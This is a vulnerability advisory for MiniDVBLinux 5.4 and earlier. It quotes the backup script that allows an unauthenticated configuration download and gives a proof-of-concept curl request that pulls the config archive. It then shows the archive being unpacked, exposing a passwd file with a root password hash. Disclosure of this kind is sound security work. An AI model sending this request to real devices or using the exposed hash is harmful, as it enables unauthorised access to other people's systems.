MiniDVBLinux 5.4 Config Download Exploit


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application is vulnerable to unauthenticated configuration
download when direct object reference is made to the backup function
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.

====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
01: <?
02: if [ "$GET_action" = "getconfig" ]; then
03:     . /etc/rc.config
04:     header "Content-Type: application/x-compressed-tar"
05:     header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
06:     /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
07:     cat /tmp/backup_config_$$.tgz
08:     rm -rf /tmp/backup_config*
09:     exit
10: fi
11: ?>
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>

====================================================================

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php


24.09.2022

--


> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>